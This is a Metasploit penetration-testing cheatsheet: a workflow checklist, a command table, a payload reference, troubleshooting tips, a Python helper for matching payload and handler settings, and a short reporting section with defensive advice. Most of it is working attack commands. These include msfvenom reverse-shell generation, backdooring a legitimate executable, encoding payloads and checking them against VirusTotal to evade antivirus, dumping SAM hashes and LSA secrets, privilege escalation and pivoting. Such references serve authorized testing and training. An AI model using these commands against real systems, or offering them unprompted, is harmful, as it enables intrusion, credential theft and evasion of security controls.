Methodology Checklist
- Start MSF with DB: msfdb run
- Set workspace: workspace -a [NAME]
- Import Nmap scan: db_import [FILE].xml
- Find relevant module: search type:exploit name:[SERVICE]
- Set required options: use [MODULE], set RHOSTS, set LHOST/LPORT
- Verify target is exploitable: check
- Execute: exploit -j (background job) or run
- Migrate to a stable process after obtaining a Meterpreter shell
Operational Context
Use when: you need a quick MSF command reference during active exploitation: session management, module search, handler setup, and Meterpreter commands.
Think Dumber First: search before use, show options before run, and sessions -l to see what you already have. Don't start new exploit modules while existing sessions are unmanaged.
Skip when: N/A; this is a reference document for active MSF use.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| sudo systemctl start postgresql && sudo msfdb run | Start DB + launch MSF |
| db_status | Verify DB connection |
| workspace -a [NAME] | Create + switch workspace |
| db_nmap -sV -sS [TARGET_IP] | Scan and auto-store results |
| db_import [FILE].xml | Import external Nmap XML |
| hosts -u | Show live hosts from DB |
| services -p [PORT] | Filter services by port |
| creds | List all stored credentials |
| loot | List all captured files/hashes |
| db_export -f xml backup.xml | Backup database |
| search [KEYWORD] | Search modules by keyword |
| search type:exploit name:[NAME] | Filtered module search |
| grep meterpreter grep reverse_tcp show payloads | Chain grep to filter payloads |
| use [MODULE] | Select module by path or index |
| show options | Display module settings |
| set RHOSTS [TARGET_IP] | Set target |
| set LHOST tun0 | Set attacker VPN IP (interface name is resolved by MSF) |
| set LPORT [PORT] | Set listener port |
| set payload [PAYLOAD] | Set payload |
| exploit | Run exploit |
| exploit -j | Run as background job |
| sessions -l | List sessions |
| sessions -i [ID] | Interact with session |
| background | Background current session |
| jobs -l | List background jobs |
| jobs -K | Kill all jobs (clear stuck listeners) |
| use multi/handler | Generic listener for standalone payloads |
| migrate [PID] | Move Meterpreter to stable/privileged process |
| getsystem | Auto-escalate to SYSTEM |
| steal_token [PID] | Impersonate process token |
| hashdump | Dump SAM hashes (needs SYSTEM) |
| lsa_dump_secrets | Dump LSA secrets |
| portfwd add -l [LPORT] -p [RPORT] -r [TARGET_IP] | Port forward through session |
| route add [NET] [MASK] [SESSION_ID] | Add pivot route |
| use post/multi/recon/local_exploit_suggester | Find kernel privesc exploits |
| use post/multi/manage/shell_to_meterpreter | Upgrade dumb shell to Meterpreter |
| searchsploit -t [NAME] --exclude=".py" | Find Ruby MSF modules in exploit-db |
| mkdir -p ~/.msf4/modules/exploits/[PATH]/ && cp [MOD].rb ~/.msf4/modules/exploits/[PATH]/ | Install custom module |
| reload_all | Reload all modules after installing a custom one |
| msfvenom -p [PAYLOAD] LHOST=[IP] LPORT=[PORT] -f [FORMAT] -o [FILE] | Generate standalone payload |
| msfvenom -p [PAYLOAD] LHOST=[IP] LPORT=[PORT] -b "\x00" -f [FORMAT] | Remove bad chars from payload |
| msfvenom -p [PAYLOAD] LHOST=[IP] LPORT=[PORT] -e x86/shikata_ga_nai -i 10 -f exe -o shell.exe | Encode with SGN (10 iterations) |
| msfvenom -p [PAYLOAD] LHOST=[IP] LPORT=[PORT] -k -x [LEGIT].exe -f exe -o backdoor.exe | Inject into legitimate executable |
| msf-virustotal -k [API_KEY] -f [FILE].exe | Check payload against VirusTotal |
Deep Dive & Workflow
Full Engagement Workflow
1. sudo msfdb run
2. workspace -a [ClientName]
3. db_nmap -sV -sS [TARGET]
4. hosts / services: review findings
5. search [vuln/service]
6. use [exploit]
7. set RHOSTS/LHOST/LPORT/payload
8. exploit
9. [In Meterpreter] getuid, then ps, then migrate, then getsystem/steal_token
10. hashdump / lsa_dump_secrets
11. creds: reuse stored credentials for lateral movement
12. db_export -f xml backup.xml
Staged vs Stageless Quick Reference
/ = staged: windows/x64/shell/reverse_tcp (two steps: a small stager connects back, then the handler sends the rest of the payload)
_ = stageless: windows/x64/shell_reverse_tcp (one file containing the whole payload)
Common Payloads Quick Reference
| Target | Payload | Format |
|---|---|---|
| Windows CMD | windows/x64/shell_reverse_tcp | exe |
| Windows Meterpreter | windows/x64/meterpreter/reverse_tcp | exe |
| Windows IIS | windows/meterpreter/reverse_tcp | aspx |
| Linux Meterpreter | linux/x64/meterpreter/reverse_tcp | elf |
| PHP web | php/reverse_php | raw |
| Java Tomcat | java/jsp_shell_reverse_tcp | war |
Key Port Choices
| Port | Why |
|---|---|
| 443 | HTTPS; almost never blocked |
| 80 | HTTP |
| 4444 | MSF default; avoid in prod |
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Module search returns nothing | Wrong keyword | Try by CVE: search cve:2021-41773; or type: search type:exploit platform:windows smb |
| run/exploit returns "no session created" | Payload or network issue | Check handler is running: jobs -l; verify LHOST/LPORT match handler settings |
| Session dies immediately | Payload crash or AV kill | Use set ExitOnSession false; switch to HTTPS payload for AV evasion |
| Background session inaccessible | Session ID wrong | sessions -l to list; sessions -i [ID] to interact |
| Post module fails on session | Wrong session type | Verify with sessions -l: meterpreter and shell sessions have different post module compatibility |
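The "no session created" row above and the Staged vs Stageless section both come down to the same pre-flight check: the msfvenom command line and the multi/handler settings must agree on payload form, LHOST and LPORT. The following helper is an added example, not part of the original cheatsheet or of Metasploit itself; the msfvenom command line and handler .rc text it parses are constructed samples, and the staged/stageless rule is the naming convention the page states (bare transport after a slash = staged).

```python
import re
import shlex
# Transport tokens; as the bare last path component they mark a staged payload.
TRANSPORTS = {"reverse_tcp", "reverse_http", "reverse_https", "bind_tcp"}
STAGED_RE = re.compile(r"/(%s)$" % "|".join(sorted(TRANSPORTS)))

def payload_kind(name):
    # '/' before the transport (shell/reverse_tcp) = staged; '_' (shell_reverse_tcp) = stageless.
    return "staged" if STAGED_RE.search(name) else "stageless"

def parse_msfvenom(cmdline):
    # Pull payload, LHOST and LPORT out of an msfvenom command line.
    argv, opts = shlex.split(cmdline), {}
    for i, tok in enumerate(argv):
        if tok == "-p" and i + 1 < len(argv):
            opts["payload"] = argv[i + 1]
        elif "=" in tok and tok.split("=", 1)[0] in ("LHOST", "LPORT"):
            key, val = tok.split("=", 1)
            opts[key] = val
    return opts

def parse_handler_rc(text):
    # Pull payload, LHOST and LPORT out of msfconsole 'set' lines (e.g. a handler .rc file).
    opts = {}
    for m in re.finditer(r"^\s*set\s+(payload|LHOST|LPORT)\s+(\S+)", text, re.M | re.I):
        key = m.group(1)
        opts["payload" if key.lower() == "payload" else key.upper()] = m.group(2)
    return opts

def check_match(venom, handler):
    # Findings explaining why the handler would not catch this payload; [] means consistent.
    # LHOST is compared as text, so 'tun0' on one side and an IP on the other is a mismatch.
    findings = []
    vp, hp = venom.get("payload"), handler.get("payload")
    if vp != hp:
        msg = f"payload mismatch: msfvenom={vp!r} handler={hp!r}"
        if vp and hp and STAGED_RE.sub(r"_\1", vp) == STAGED_RE.sub(r"_\1", hp):
            msg += f" ({payload_kind(vp)} vs {payload_kind(hp)}; both sides must use the same form)"
        findings.append(msg)
    for key in ("LHOST", "LPORT"):
        if venom.get(key) != handler.get(key):
            findings.append(f"{key} mismatch: msfvenom={venom.get(key)!r} handler={handler.get(key)!r}")
    if venom.get("LPORT") == "4444":
        findings.append("LPORT 4444 is the MSF default; prefer 443 or 80 (see Key Port Choices)")
    return findings

# Constructed sample: a stageless exe paired with a staged handler listening on a different port.
VENOM_CMD = "msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe"
HANDLER_RC = "use multi/handler\nset payload windows/x64/shell/reverse_tcp\nset LHOST 10.10.14.5\nset LPORT 443\nexploit -j\n"
```

Running check_match(parse_msfvenom(VENOM_CMD), parse_handler_rc(HANDLER_RC)) on the sample reports the stageless/staged payload mismatch, the LPORT mismatch, and the default-port warning.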
Reporting Trigger
Finding Title: Metasploit Framework Used for Exploitation and Post-Exploitation
Impact: MSF provides integrated exploit delivery, session management, and post-exploitation modules enabling rapid pivoting from initial access to full domain compromise.
Root Cause: Exploitable service with no EDR capable of detecting Meterpreter session establishment or post-exploitation module execution.
Recommendation: Deploy EDR with Meterpreter detection signatures. Implement network-level detection for MSF staging traffic. Alert on unusual LSASS access patterns indicative of MSF credential dumping modules.